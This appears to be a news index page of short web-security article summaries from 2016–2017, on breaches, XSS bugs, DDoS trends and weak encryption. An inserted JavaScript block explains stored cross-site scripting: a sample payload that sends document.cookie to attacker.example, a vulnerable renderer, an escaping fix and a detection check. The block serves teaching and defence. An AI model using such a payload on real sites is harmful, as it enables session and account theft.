Articles about web security

Finance sector is littered with vulns, and guess what – most can be resolved by patching

Security vulnerabilities across the finance sector have increased more than fivefold (418 per cent) in the last four years, according to a study by NCC Group. The most common high and medium-risk vulnerabilities were found in customer-facing web apps. NCC categorised vulnerabilities found in 168 financial services …
John Leyden, 22 Sep 2017
Equifax UK admits: 400,000 Brits caught up in mega-breach

Equifax UK has surfaced to say that British systems were not affected by a recently disclosed megahack; however, 400,000 UK people were affected due to a “process failure.” The credit reference agency is saying that UK-dedicated systems were not affected by the security breach at its US parent firm that exposed the personal …
John Leyden, 15 Sep 2017

Defrosted starter for 10: Iceland home delivery site spills customer details

Iceland’s home delivery service exposed sensitive customer information for months until the problem was plugged this week, a UK security researcher discovered. Paul Moore went public with his findings after failing to get the retailer to act even 12 months after first reporting the issue. Public disclosure finally prompted …
John Leyden, 14 Sep 2017
Credit reference agencies faulted for poor patching

Updated Experian and AnnualCreditReport.com – an organization set up by Equifax, Experian and TransUnion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year. The security shortcoming raises important questions following the disclosure of a mega-breach at …
John Leyden, 13 Sep 2017
Slack quick to whack account hijack crack

Slack quickly squashed a potential account hijack bug hours after it was reported. Frans Rosén, a security researcher at Detectify, discovered a vulnerability in Slack that created a means for a malicious website to steal a user's Slack token, potentially seizing control of their account in the process. Slack fixed the bug in …
John Leyden, 3 Mar 2017

Tricksy bugs in Zscaler admin portal let you ruin a coworker's day

Cloud management software peddler Zscaler has plugged cross-site scripting holes in the admin portal it provides to customers. People logged into the website could have exploited the bugs to inject malicious HTML and JavaScript into the browsers of other users of the site, allowing them to take over their accounts and perform …
John Leyden, 1 Mar 2017

Rasputin whips out large intimidating tool, penetrates uni, city, govt databases – new claim

A Russian-speaking miscreant dubbed "Rasputin," who potentially hacked into the US Election Assistance Commission and sold access to its systems, has struck again, it is claimed. Rasputin has allegedly infiltrated database servers within 60 organizations, US government agencies, and international universities. These victims …
John Leyden, 15 Feb 2017
Battle of the botnets: My zombie horde's bigger than yours

DDoS attacks more than doubled in the last quarter of 2016 compared to the same period the year before. Although the infamous Mirai IoT botnets accounted for many of the most severe attacks, the biggest single assault came from a different zombie network, according to a new study by Akamai out Tuesday. Attacks greater than …
John Leyden, 14 Feb 2017

PayAsUGym breach exposes passwords

Fitness website PayAsUGym has been breached in a hack that may have exposed up to 400K emails and passwords. In a breach notice to users, the firm admitted one of its servers was hacked after “underground researchers” posted screenshots purporting to show PayAsUGym’s hacked database via Twitter. The 1x0123 hacker crew later …
John Leyden, 19 Dec 2016
US voting machine certification agency probes potential hack

The US agency charged with ensuring that voting machines meet security standards may have been compromised, according to evidence uncovered by cyber security firm Recorded Future. In a statement, the EAC confirmed it was investigating a potential breach. EAC has become aware of a potential intrusion into an EAC web-facing …
John Leyden, 16 Dec 2016

Web security still outstandingly mediocre, experts report

Black Hat EU Cross-site scripting (XSS) vulnerabilities continue to dominate the list of most common vulnerabilities found in real-world tests. In more than a third (37 per cent) of cases, a website vulnerable to XSS is also vulnerable to a more critical flaw such as SQL injection or improper access control, according to web security …
John Leyden, 7 Nov 2016
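The Zscaler admin-portal item and the Black Hat EU item above turn on the same defect: one user's untrusted input is echoed into another user's page, and that viewer's session is what the injected script runs with. As an added example that is not code from either article (the portal, the field, the helper names and the payload are all constructed), here is the vulnerable rendering pattern beside its output-encoding fix, plus a small check a test suite could run over rendered HTML:

```javascript
// Added example, not code from the articles above. A constructed "display name"
// value as another portal user might submit it; the attacker.example host is a
// placeholder.
const ATTACKER_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable renderer: the value is concatenated straight into the HTML, so the
// browser of whoever views this row executes the attacker's JavaScript with the
// viewer's cookies and session. This is the shape of a stored XSS bug.
function renderUserRowVulnerable(displayName) {
  return `<tr><td>${displayName}</td></tr>`;
}

// Output encoding for HTML text and quoted-attribute contexts: every character
// that can open or close a tag, attribute or entity is replaced by its entity.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened renderer: identical markup, but the untrusted value is encoded at
// the point where it enters the HTML. The payload is displayed as text only.
function renderUserRowSafe(displayName) {
  return `<tr><td>${escapeHtml(displayName)}</td></tr>`;
}

// Coarse check for a test suite: does the rendered HTML contain any tag the
// template did not emit, or any on*= event-handler attribute? Entity-encoded
// text never matches because it contains no literal '<'.
function containsInjectedMarkup(html, templateTags = ['tr', 'td']) {
  const tagRe = /<\s*\/?\s*([a-zA-Z][\w-]*)[^>]*>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    if (!templateTags.includes(tag)) return true;
    if (/\son[a-z]+\s*=/i.test(m[0])) return true; // onerror=, onload=, ...
  }
  return false;
}

// Stand-alone demonstration of both renderers on the same input.
const vulnerableHtml = renderUserRowVulnerable(ATTACKER_NAME);
const safeHtml = renderUserRowSafe(ATTACKER_NAME);
console.log('vulnerable:', vulnerableHtml);
console.log('  injected markup?', containsInjectedMarkup(vulnerableHtml)); // true
console.log('hardened:  ', safeHtml);
console.log('  injected markup?', containsInjectedMarkup(safeHtml)); // false
```

The encoder is only correct for HTML text and quoted attribute values; a value dropped into a JavaScript string, a URL or a CSS property needs the encoder for that context, which is why templating engines that auto-escape per context are preferable to hand-rolled concatenation.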
DDoSers do it more now, but they do it less fiercely*

The number of distributed denial of service attacks has doubled over the last 12 months. Akamai reports that Q2 saw a 129 per cent year-on-year increase in total DDoS attacks. During the second quarter, Akamai mitigated a total of 4,919 attacks, one of which (against a media company) reached an eye-watering 363 Gbps. Although …
John Leyden, 15 Sep 2016

DDoS protection biz Incapsula knackers its customers' websites

Glitches at distributed denial-of-service mitigation biz Incapsula left the websites it defends offline twice on Thursday. Incapsula blamed "connectivity issues" for the global PITSTOP, aka the worldwide degradation of its services. "A rare case triggered an issue on the Incapsula service and caused two system-wide errors at …
John Leyden, 10 Mar 2016

90% of SSL VPNs are ‘hopelessly insecure’, say researchers

Nine in 10 SSL VPNs use insecure or outdated encryption, putting corporate data at risk in the process, according to new research. High-Tech Bridge (HTB) conducted large-scale Internet research on live and publicly-accessible SSL VPN servers. The firm passively scanned 10,436 randomly selected publicly available SSL VPN …
John Leyden, 26 Feb 2016

Google punts freebie DDoS shield to hacks, human rights worthies

Google has launched a free service to protect news websites against DDoS attacks. Project Shield will also be offered to human rights and election monitoring websites as a way of fending off increasingly commonplace site-swamping DDoS assaults. Google is offering to "reverse proxy" qualifying websites' traffic through Google's …
John Leyden, 25 Feb 2016

Bacs corporate website still runs obsolete crypto

UK banking organisation Bacs is running a cryptographically obsolete website despite telling everyone else to upgrade before a June deadline. Earlier this week Bacs reminded UK businesses to update their systems and adopt SHA-2 before mid-June in order to avoid losing access to vital payment and money transfer services. …
John Leyden, 19 Feb 2016

Disney World-area University admits massive data breach

The University of Central Florida (UCF) has admitted that hackers who broke into its systems may have snaffled the personal details of more than 60,000 staff and students. The breach, discovered in early January but only made public on Thursday, exposed the social security numbers and other private information of 63,000 …
John Leyden, 5 Feb 2016
Commuters slam UK rail operator c2c. You slow, late, er... privacy violator

Commuters in the south east of England, already angry about recent timetable changes and delays, have been further incensed by basic security blunders by rail operator c2c as it tried to placate passenger disquiet with a new compensation form on its website. The company, which operates rail service between London Fenchurch …
John Leyden, 25 Jan 2016

Biting the hand that feeds IT © 1998–2017